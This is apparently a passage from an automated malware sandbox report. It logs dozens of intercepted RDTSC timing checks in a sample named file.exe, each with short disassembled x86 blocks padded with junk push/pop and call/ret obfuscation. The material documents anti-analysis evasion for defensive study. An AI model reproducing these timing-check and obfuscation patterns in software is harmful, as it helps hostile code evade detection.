Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE5EB second address: FFE5F8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE654 second address: FFE659 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE659 second address: FFE6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F70146AC613h 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F70146AC608h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 movzx ecx, si 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F70146AC60Dh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE6AE second address: FFE6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE6B2 second address: FFE6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE6B8 second address: FFE6FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CBFh 0x00000008 jmp 00007F7014CC2CC9h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jl 00007F7014CC2CD2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7014CC2CC0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE6FF second address: FFE703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE976 second address: FFE98C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE98C second address: FFE9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F70146AC608h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F70146AC608h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d nop 0x0000003e jc 00007F70146AC61Fh 0x00000044 push eax 0x00000045 push edx 0x00000046 jne 00007F70146AC606h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE9EB second address: FFEA06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F7014CC2CB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFEDBD second address: FFEDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFEDC1 second address: FFEDE6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7014CC2CC1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFEF84 second address: FFEF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF11C second address: FFF121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF1FF second address: FFF2C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F70146AC60Bh 0x0000000f lea eax, dword ptr [ebp+12471B05h] 0x00000015 jnp 00007F70146AC606h 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F70146AC612h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007F70146AC612h 0x0000002b popad 0x0000002c mov dword ptr [esp], eax 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F70146AC608h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 lea eax, dword ptr [ebp+12471AC1h] 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007F70146AC608h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 nop 0x0000006a jmp 00007F70146AC60Ch 0x0000006f push eax 0x00000070 push ecx 0x00000071 push eax 0x00000072 push edx 0x00000073 push edi 0x00000074 pop edi 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF2C0 second address: FE3DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7014CC2CB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D2E38h], ecx 0x00000028 call dword ptr [ebp+122D19A9h] 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 jmp 00007F7014CC2CBAh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1045D1F second address: 1045D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F70146AC606h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1045EA6 second address: 1045EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1045EC3 second address: 1045ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104604E second address: 10460BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC5h 0x00000009 jmp 00007F7014CC2CC8h 0x0000000e popad 0x0000000f ja 00007F7014CC2CBCh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7014CC2CC9h 0x0000001c jmp 00007F7014CC2CC8h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10460BF second address: 10460C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104C611 second address: 104C617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104C617 second address: 104C62A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104C62A second address: 104C631 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104DD40 second address: 104DD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Eh 0x00000009 pop edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jo 00007F70146AC606h 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jng 00007F70146AC60Ch 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104DD74 second address: 104DD96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7014CC2CB6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F7014CC2CC1h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10500C9 second address: 10500CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10500CF second address: 10500E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7014CC2CBDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104FC5F second address: 104FC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104FC64 second address: 104FC6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105286C second address: 105288A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ch 0x00000007 jnl 00007F70146AC606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F70146AC608h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1052C9C second address: 1052CBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1052CBB second address: 1052CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F70146AC606h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1052CC8 second address: 1052CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1052CCE second address: 1052CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70146AC619h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1057D71 second address: 1057D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1058127 second address: 1058131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1058295 second address: 10582A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4181 second address: FC4187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4187 second address: FC418C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC418C second address: FC419B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC419B second address: FC41AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F7014CC2CB6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105B058 second address: 105B06A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105B06A second address: 105B06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106101D second address: 106104F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70146AC616h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105FAA2 second address: 105FABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7014CC2CB6h 0x0000000a jmp 00007F7014CC2CC0h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105FBE1 second address: 105FC12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnp 00007F70146AC606h 0x0000000d js 00007F70146AC606h 0x00000013 popad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f jmp 00007F70146AC611h 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFEC65 second address: FFEC8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F7014CC2CC2h 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jg 00007F7014CC2CBCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFEC8E second address: FFEC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007F70146AC606h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1060D03 second address: 1060D0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7014CC2CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10672C8 second address: 10672CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1067499 second address: 106749F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10679B5 second address: 10679B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068187 second address: 1068193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7014CC2CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068193 second address: 1068197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068758 second address: 106877C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7014CC2CBFh 0x00000010 push ebx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10689F7 second address: 10689FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10689FD second address: 1068A18 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 je 00007F7014CC2CB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068A18 second address: 1068A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068D22 second address: 1068D2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068D2C second address: 1068D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C134 second address: 106C13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C13A second address: 106C142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C276 second address: 106C280 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C280 second address: 106C290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F70146AC606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C290 second address: 106C294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C574 second address: 106C57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C57A second address: 106C589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7014CC2CB6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C589 second address: 106C58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C58D second address: 106C5AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C5AD second address: 106C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C6F6 second address: 106C711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CC4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1077A5D second address: 1077A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1077A6D second address: 1077A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1077E52 second address: 1077E85 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F70146AC606h 0x00000008 ja 00007F70146AC606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F70146AC615h 0x00000015 pushad 0x00000016 jmp 00007F70146AC60Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107800E second address: 107802B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7014CC2CB6h 0x0000000a popad 0x0000000b push edi 0x0000000c jnp 00007F7014CC2CB6h 0x00000012 jng 00007F7014CC2CB6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107802B second address: 1078039 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078495 second address: 107849F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7014CC2CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078756 second address: 1078760 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70146AC60Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078F18 second address: 1078F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7014CC2CC2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078F35 second address: 1078F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F70146AC606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10774A6 second address: 10774BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7014CC2CBFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107FDF4 second address: 107FDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107FDFC second address: 107FE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107FF39 second address: 107FF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107FF50 second address: 107FF55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108F3D1 second address: 108F3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
